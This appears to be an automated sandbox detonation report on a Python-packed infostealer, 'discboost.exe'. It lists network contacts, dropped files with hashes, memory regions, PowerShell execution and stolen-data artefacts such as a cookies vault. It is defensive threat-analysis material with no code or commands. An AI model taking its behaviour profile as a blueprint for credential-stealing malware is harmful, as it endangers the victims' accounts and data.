US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 www.cloudflare.com udp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 8.8.8.8:53 96.123.16.104.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
NL 20.103.156.88:443 fd.api.iris.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29562\python310.dll

MD5 178a0f45fde7db40c238f1340a0c0ec0
SHA1 dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe
SHA256 9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed
SHA512 4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

C:\Users\Admin\AppData\Local\Temp\_MEI29562\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/236-26-0x00007FFBAB8D0000-0x00007FFBABD3E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI29562\base_library.zip

MD5 5bf257cce4b4a29fa20ddc5bc6889973
SHA1 2c9a24a961b5c475a77a1460e48bdc2b0c3e79ad
SHA256 f55752b907702ff162760809519315c278b013f84ff8f4b001268b84fedd70ae
SHA512 2e188c87cca4c398c9144aa9330a6420f14c2b45c12f49dfe378240c51143f9f0c115dec307420f94bb1aad0f91b1775b8102e78899f13cf36f076626c9f3216

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_ctypes.pyd

MD5 813fc3981cae89a4f93bf7336d3dc5ef
SHA1 daff28bcd155a84e55d2603be07ca57e3934a0de
SHA256 4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06
SHA512 ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

C:\Users\Admin\AppData\Local\Temp\_MEI29562\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

memory/236-31-0x00007FFBBB760000-0x00007FFBBB784000-memory.dmp

memory/236-50-0x00007FFBC0E70000-0x00007FFBC0E7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_ssl.pyd

MD5 081c878324505d643a70efcc5a80a371
SHA1 8bef8336476d8b7c5c9ef71d7b7db4100de32348
SHA256 fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66
SHA512 c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_sqlite3.pyd

MD5 bb4aa2d11444900c549e201eb1a4cdd6
SHA1 ca3bb6fc64d66deaddd804038ea98002d254c50e
SHA256 f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f
SHA512 cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_socket.pyd

MD5 7a31bc84c0385590e5a01c4cbe3865c3
SHA1 77c4121abe6e134660575d9015308e4b76c69d7c
SHA256 5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36
SHA512 b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_queue.pyd

MD5 0e7612fc1a1fad5a829d4e25cfa87c4f
SHA1 3db2d6274ce3dbe3dbb00d799963df8c3046a1d6
SHA256 9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8
SHA512 52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_lzma.pyd

MD5 6f810f46f308f7c6ccddca45d8f50039
SHA1 6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea
SHA256 39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76
SHA512 c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_hashlib.pyd

MD5 4ae75c47dbdebaa16a596f31b27abd9e
SHA1 a11f963139c715921dedd24bc957ab6d14788c34
SHA256 2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d
SHA512 e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_decimal.pyd

MD5 f65d2fed5417feb5fa8c48f106e6caf7
SHA1 9260b1535bb811183c9789c23ddd684a9425ffaa
SHA256 574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8
SHA512 030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_bz2.pyd

MD5 93fe6d3a67b46370565db12a9969d776
SHA1 ff520df8c24ed8aa6567dd0141ef65c4ea00903b
SHA256 92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b
SHA512 5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac

C:\Users\Admin\AppData\Local\Temp\_MEI29562\unicodedata.pyd

MD5 7a462a10aa1495cef8bfca406fb3637e
SHA1 6dcbd46198b89ef3007c76deb42ab10ba4c4cf40
SHA256 459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0
SHA512 d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

C:\Users\Admin\AppData\Local\Temp\_MEI29562\sqlite3.dll

MD5 bd2819965b59f015ec4233be2c06f0c1
SHA1 cff965068f1659d77be6f4942ca1ada3575ca6e2
SHA256 ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec
SHA512 f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59

C:\Users\Admin\AppData\Local\Temp\_MEI29562\select.pyd

MD5 666358e0d7752530fc4e074ed7e10e62
SHA1 b9c6215821f5122c5176ce3cf6658c28c22d46ba
SHA256 6615c62fa010bfba5527f5da8af97313a1af986f8564277222a72a1731248841
SHA512 1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d

C:\Users\Admin\AppData\Local\Temp\_MEI29562\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI29562\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI29562\libssl-1_1.dll

MD5 eac369b3fde5c6e8955bd0b8e31d0830
SHA1 4bf77158c18fe3a290e44abd2ac1834675de66b4
SHA256 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c
SHA512 c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

C:\Users\Admin\AppData\Local\Temp\_MEI29562\libcrypto-1_1.dll

MD5 daa2eed9dceafaef826557ff8a754204
SHA1 27d668af7015843104aa5c20ec6bbd30f673e901
SHA256 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914
SHA512 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

C:\Users\Admin\AppData\Local\Temp\_MEI29562\bound.blank

MD5 e738aaa0bed2b07638dc0d09d3afba7a
SHA1 a03a80dc64b3ee98fe2efbddc797fc980f224369
SHA256 c8c0d0ef85f0eab7a658c4bd12ceeb0b1736cfb22bd61fdeef8a1de750ff5c0f
SHA512 e940541807f85631402179d5d573c5e901340736f2d29e3348a784ddb9183910d058203a4a3f3d38d0bc9bb428840f1758915a895f01bea2af9ee75afc383589

C:\Users\Admin\AppData\Local\Temp\_MEI29562\blank.aes

MD5 9d7da69c4538f5cf8ac83f2291940f96
SHA1 0e61945d7f25cd448d938b793868c042b7e92ca9
SHA256 00d0e262de5e4756166cdd9cc25ce61f3a42cf3f1f95db7ea1f00d27f1074e25
SHA512 51b751ec825f36959c41543b79549aa9983266b0e659d94578a4b90614e7682dc1daa699e128206c1307b90bd188f32d08e927c29dc1a1fa7d59917fb3b23798

memory/236-58-0x00007FFBBBD20000-0x00007FFBBBD39000-memory.dmp

memory/236-60-0x00007FFBBB440000-0x00007FFBBB45F000-memory.dmp

memory/236-57-0x00007FFBBB540000-0x00007FFBBB56D000-memory.dmp

memory/236-62-0x00007FFBABD40000-0x00007FFBABEB1000-memory.dmp

memory/236-66-0x00007FFBC0DC0000-0x00007FFBC0DCD000-memory.dmp

memory/236-65-0x00007FFBBB420000-0x00007FFBBB439000-memory.dmp

memory/236-69-0x00007FFBBA890000-0x00007FFBBA8BE000-memory.dmp

memory/236-68-0x00007FFBAB8D0000-0x00007FFBABD3E000-memory.dmp

memory/236-71-0x00007FFBBA7D0000-0x00007FFBBA888000-memory.dmp

memory/236-76-0x000001C714500000-0x000001C714875000-memory.dmp

memory/236-80-0x00007FFBBA1B0000-0x00007FFBBA1C4000-memory.dmp

memory/236-79-0x00007FFBC0AF0000-0x00007FFBC0AFD000-memory.dmp

memory/236-75-0x00007FFBAB330000-0x00007FFBAB6A5000-memory.dmp

memory/236-74-0x00007FFBBB760000-0x00007FFBBB784000-memory.dmp

memory/236-83-0x00007FFBAAB70000-0x00007FFBAAC88000-memory.dmp

memory/2700-85-0x000002F6F27F0000-0x000002F6F2812000-memory.dmp

memory/2700-84-0x000002F6F2850000-0x000002F6F28DA000-memory.dmp

memory/2700-100-0x000002F6F27D0000-0x000002F6F27E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e540z2ao.flj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2700-105-0x000002F6F2B30000-0x000002F6F2C32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 1751ce1a1deee3c0898ece2acf872504
SHA1 691d0f705828572b0af7f82bbd9e8e16138bb318
SHA256 3d88ef5bfef5515d6b1662ba2af6e91eacdd93a3cd23895c8e418457a03ef130
SHA512 7df7a0ca995ae03988ae41569b30fabdc9d085ccb9da4637e5017263b32fe20b1287d1860d5a4d1637de2d636d6733590958aec995fc4b4a570af0ad7eac9591

memory/236-106-0x00007FFBBBD20000-0x00007FFBBBD39000-memory.dmp

memory/2700-228-0x000002F6F2A70000-0x000002F6F2ABC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\setuptools-65.5.0.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\AppData\Local\Temp\_MEI43922\python310.dll

MD5 69d4f13fbaeee9b551c2d9a4a94d4458
SHA1 69540d8dfc0ee299a7ff6585018c7db0662aa629
SHA256 801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046
SHA512 8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

memory/236-253-0x00007FFBBB440000-0x00007FFBBB45F000-memory.dmp

memory/4364-254-0x00007FFB9F850000-0x00007FFB9FCBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\python3.dll

MD5 c17b7a4b853827f538576f4c3521c653
SHA1 6115047d02fbbad4ff32afb4ebd439f5d529485a
SHA256 d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68
SHA512 8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7

C:\Users\Admin\AppData\Local\Temp\_MEI43922\_ctypes.pyd

MD5 6ca9a99c75a0b7b6a22681aa8e5ad77b
SHA1 dd1118b7d77be6bb33b81da65f6b5dc153a4b1e8
SHA256 d39390552c55d8fd4940864905cd4437bc3f8efe7ff3ca220543b2c0efab04f8
SHA512 b0b5f2979747d2f6796d415dd300848f32b4e79ede59827ac447af0f4ea8709b60d6935d09e579299b3bc54b6c0f10972f17f6c0d1759c5388ad5b14689a23fe

memory/4364-264-0x00007FFBB2550000-0x00007FFBB2574000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\libffi-7.dll

MD5 b5150b41ca910f212a1dd236832eb472
SHA1 a17809732c562524b185953ffe60dfa91ba3ce7d
SHA256 1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a
SHA512 9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

memory/4364-266-0x00007FFBBBFC0000-0x00007FFBBBFCF000-memory.dmp

memory/236-263-0x00007FFBBB420000-0x00007FFBBB439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\_bz2.pyd

MD5 758fff1d194a7ac7a1e3d98bcf143a44
SHA1 de1c61a8e1fb90666340f8b0a34e4d8bfc56da07
SHA256 f5e913a9f2adf7d599ea9bb105e144ba11699bbcb1514e73edcf7e062354e708
SHA512 468d7c52f14812d5bde1e505c95cb630e22d71282bda05bf66324f31560bfa06095cf60fc0d34877f8b361ccd65a1b61d0fd1f91d52facb0baf8e74f3fed31cc

C:\Users\Admin\AppData\Local\Temp\_MEI43922\pyexpat.pyd

MD5 5a328b011fa748939264318a433297e2
SHA1 d46dd2be7c452e5b6525e88a2d29179f4c07de65
SHA256 e8a81b47029e8500e0f4e04ccf81f8bdf23a599a2b5cd627095678cdf2fabc14
SHA512 06fa8262378634a42f5ab8c1e5f6716202544c8b304de327a08aa20c8f888114746f69b725ed3088d975d09094df7c3a37338a93983b957723aa2b7fda597f87

memory/236-282-0x000001C714500000-0x000001C714875000-memory.dmp

memory/236-306-0x00007FFBBB540000-0x00007FFBBB56D000-memory.dmp

memory/4364-310-0x00007FFBBB760000-0x00007FFBBB78B000-memory.dmp

memory/4364-309-0x00007FFBA3920000-0x00007FFBA39DC000-memory.dmp

memory/236-308-0x00007FFBBB440000-0x00007FFBBB45F000-memory.dmp

memory/4364-317-0x00007FFBB2550000-0x00007FFBB2574000-memory.dmp

memory/4364-316-0x00007FFBC0A60000-0x00007FFBC0A7C000-memory.dmp

memory/4364-318-0x00007FFBBB540000-0x00007FFBBB56E000-memory.dmp

memory/4364-320-0x00007FFBABA80000-0x00007FFBABB38000-memory.dmp

memory/4364-321-0x00007FFBBBD20000-0x00007FFBBBD34000-memory.dmp

memory/696-328-0x000001CA796A0000-0x000001CA796C0000-memory.dmp

memory/4364-327-0x00007FFBAB910000-0x00007FFBAB92F000-memory.dmp

memory/4364-326-0x00007FFBA3920000-0x00007FFBA39DC000-memory.dmp

memory/4364-329-0x00007FFBAB540000-0x00007FFBAB6B1000-memory.dmp

memory/4364-330-0x00007FFBAB8D0000-0x00007FFBAB907000-memory.dmp

memory/4364-336-0x00007FFBB6E80000-0x00007FFBB6E8B000-memory.dmp

memory/4364-335-0x00007FFBB7BF0000-0x00007FFBB7BFC000-memory.dmp

memory/4364-334-0x00007FFBB8900000-0x00007FFBB890B000-memory.dmp

memory/4364-333-0x00007FFBB9F70000-0x00007FFBB9F7C000-memory.dmp

memory/4364-332-0x00007FFBBB410000-0x00007FFBBB41B000-memory.dmp

memory/4364-331-0x00007FFBC0AF0000-0x00007FFBC0AFB000-memory.dmp

memory/4364-364-0x00007FFBAB340000-0x00007FFBAB351000-memory.dmp

memory/4364-363-0x00007FFBAB360000-0x00007FFBAB3AD000-memory.dmp

memory/4364-362-0x00007FFBAB3B0000-0x00007FFBAB3C9000-memory.dmp

memory/4364-361-0x00007FFBAB3D0000-0x00007FFBAB3E6000-memory.dmp

memory/4364-360-0x00007FFBAB3F0000-0x00007FFBAB40B000-memory.dmp

memory/4364-359-0x00007FFBAB410000-0x00007FFBAB432000-memory.dmp

memory/4364-358-0x00007FFBAB440000-0x00007FFBAB454000-memory.dmp

memory/4364-357-0x00007FFBAB460000-0x00007FFBAB470000-memory.dmp

memory/4364-356-0x00007FFBAB470000-0x00007FFBAB485000-memory.dmp

memory/4364-355-0x00007FFBAB490000-0x00007FFBAB49C000-memory.dmp

memory/4364-354-0x00007FFBAB4A0000-0x00007FFBAB4B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloads_db

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\Users\Admin\AppData\Local\Temp\vault\cookies.txt

MD5 0ec4d69da9e7433b0e78e3fbe4bfab00
SHA1 200198f855d1d4ad6f610a4219048dc756d64604
SHA256 3716b47b6c1facaac1c164344bec3a39b8aa10cc18229d687d030167a3ae675f
SHA512 a1d9333859c76c0580ccbf4c689999db7bf83d9a727cf5f8cb43ca554cf445dfec03932cbaeb74b9bdfccd8b742afe539a980ca93be2194349249659c1db7307

C:\Users\Admin\AppData\Local\Temp\downloads_db

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

memory/4364-353-0x00007FFBAB4C0000-0x00007FFBAB4CD000-memory.dmp

memory/4364-352-0x00007FFBAB4D0000-0x00007FFBAB4DC000-memory.dmp

memory/4364-351-0x00007FFBAB4E0000-0x00007FFBAB4EC000-memory.dmp

memory/4364-350-0x00007FFBAB4F0000-0x00007FFBAB4FB000-memory.dmp

memory/4364-349-0x00007FFBAB500000-0x00007FFBAB50B000-memory.dmp

memory/4364-348-0x00007FFBAB510000-0x00007FFBAB51C000-memory.dmp

memory/4364-347-0x00007FFBAB520000-0x00007FFBAB52C000-memory.dmp

memory/4364-346-0x00007FFBAB530000-0x00007FFBAB53E000-memory.dmp

memory/4364-345-0x00007FFBB4590000-0x00007FFBB459C000-memory.dmp

memory/4364-344-0x00007FFBABA80000-0x00007FFBABB38000-memory.dmp

memory/4364-343-0x00007FFBABB40000-0x00007FFBABEB5000-memory.dmp

memory/4364-342-0x00007FFBBB540000-0x00007FFBBB56E000-memory.dmp

memory/4364-325-0x00007FFBAB930000-0x00007FFBABA48000-memory.dmp

memory/4364-324-0x00007FFBABA50000-0x00007FFBABA77000-memory.dmp

memory/4364-323-0x00007FFBA3AA0000-0x00007FFBA3AB9000-memory.dmp

memory/4364-322-0x00007FFBC0DC0000-0x00007FFBC0DCB000-memory.dmp

memory/4364-319-0x00007FFBABB40000-0x00007FFBABEB5000-memory.dmp

memory/4364-315-0x00007FFB9F850000-0x00007FFB9FCBE000-memory.dmp

memory/4364-314-0x00007FFBC0E70000-0x00007FFBC0E7A000-memory.dmp

memory/4364-313-0x00007FFBBB420000-0x00007FFBBB462000-memory.dmp

memory/236-307-0x00007FFBAB8D0000-0x00007FFBABD3E000-memory.dmp

memory/236-305-0x00007FFBC0E70000-0x00007FFBC0E7F000-memory.dmp

memory/236-304-0x00007FFBBB760000-0x00007FFBBB784000-memory.dmp

memory/236-303-0x00007FFBBBD20000-0x00007FFBBBD39000-memory.dmp

memory/236-302-0x00007FFBAAB70000-0x00007FFBAAC88000-memory.dmp

memory/236-301-0x00007FFBC0AF0000-0x00007FFBC0AFD000-memory.dmp

memory/236-300-0x00007FFBBA1B0000-0x00007FFBBA1C4000-memory.dmp

memory/236-299-0x00007FFBAB330000-0x00007FFBAB6A5000-memory.dmp

memory/236-298-0x00007FFBBA7D0000-0x00007FFBBA888000-memory.dmp

memory/236-297-0x00007FFBBA890000-0x00007FFBBA8BE000-memory.dmp

memory/236-296-0x00007FFBC0DC0000-0x00007FFBC0DCD000-memory.dmp

memory/236-295-0x00007FFBBB420000-0x00007FFBBB439000-memory.dmp

memory/236-294-0x00007FFBABD40000-0x00007FFBABEB1000-memory.dmp

memory/4364-287-0x00007FFBBB700000-0x00007FFBBB70D000-memory.dmp

memory/4364-286-0x00007FFBBB900000-0x00007FFBBB90D000-memory.dmp

memory/4364-285-0x00007FFBA3AA0000-0x00007FFBA3AB9000-memory.dmp

memory/4364-284-0x00007FFBA39E0000-0x00007FFBA3A0E000-memory.dmp

memory/236-283-0x00007FFBAB330000-0x00007FFBAB6A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\select.pyd

MD5 72009cde5945de0673a11efb521c8ccd
SHA1 bddb47ac13c6302a871a53ba303001837939f837
SHA256 5aaa15868421a46461156e7817a69eeeb10b29c1e826a9155b5f8854facf3dca
SHA512 d00a42700c9201f23a44fd9407fea7ea9df1014c976133f33ff711150727bf160941373d53f3a973f7dd6ca7b5502e178c2b88ea1815ca8bce1a239ed5d8256d

memory/4364-279-0x00007FFBA3AC0000-0x00007FFBA3AF4000-memory.dmp

memory/236-278-0x00007FFBBA7D0000-0x00007FFBBA888000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\_socket.pyd

MD5 afd296823375e106c4b1ac8b39927f8b
SHA1 b05d811e5a5921d5b5cc90b9e4763fd63783587b
SHA256 e423a7c2ce5825dfdd41cfc99c049ff92abfb2aa394c85d0a9a11de7f8673007
SHA512 95e98a24be9e603b2870b787349e2aa7734014ac088c691063e4078e11a04898c9c547d6998224b1b171fc4802039c3078a28c7e81d59f6497f2f9230d8c9369

memory/4364-276-0x00007FFBA3B00000-0x00007FFBA3B2D000-memory.dmp

memory/236-273-0x00007FFBBA890000-0x00007FFBBA8BE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\_lzma.pyd

MD5 abceeceaeff3798b5b0de412af610f58
SHA1 c3c94c120b5bed8bccf8104d933e96ac6e42ca90
SHA256 216aa4bb6f62dd250fd6d2dcde14709aa82e320b946a21edeec7344ed6c2c62e
SHA512 3e1a2eb86605aa851a0c5153f7be399f6259ecaad86dbcbf12eeae5f985dc2ea2ab25683285e02b787a5b75f7df70b4182ae8f1567946f99ad2ec7b27d4c7955

memory/4364-270-0x00007FFBA3B30000-0x00007FFBA3B49000-memory.dmp

memory/236-262-0x00007FFBABD40000-0x00007FFBABEB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI43922\base_library.zip

MD5 fbd6be906ac7cd45f1d98f5cb05f8275
SHA1 5d563877a549f493da805b4d049641604a6a0408
SHA256 ae35709e6b8538827e3999e61a0345680c5167962296ac7bef62d6b813227fb0
SHA512 1547b02875f3e547c4f5e15c964719c93d7088c7f4fd044f6561bebd29658a54ef044211f9d5cfb4570ca49ed0f17b08011d27fe85914e8c3ea12024c8071e8a

memory/4364-422-0x00007FFB9F850000-0x00007FFB9FCBE000-memory.dmp

memory/4364-445-0x00007FFBAB540000-0x00007FFBAB6B1000-memory.dmp

memory/4364-444-0x00007FFBAB910000-0x00007FFBAB92F000-memory.dmp

memory/4364-443-0x00007FFBAB930000-0x00007FFBABA48000-memory.dmp

memory/4364-442-0x00007FFBABA50000-0x00007FFBABA77000-memory.dmp

memory/4364-441-0x00007FFBC0DC0000-0x00007FFBC0DCB000-memory.dmp

memory/4364-440-0x00007FFBBBD20000-0x00007FFBBBD34000-memory.dmp

memory/4364-439-0x00007FFBABA80000-0x00007FFBABB38000-memory.dmp

memory/4364-438-0x00007FFBABB40000-0x00007FFBABEB5000-memory.dmp

memory/4364-437-0x00007FFBBB540000-0x00007FFBBB56E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 21:53

Reported

2024-11-10 21:54

Platform

win11-20241007-fr

Max time kernel

12s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
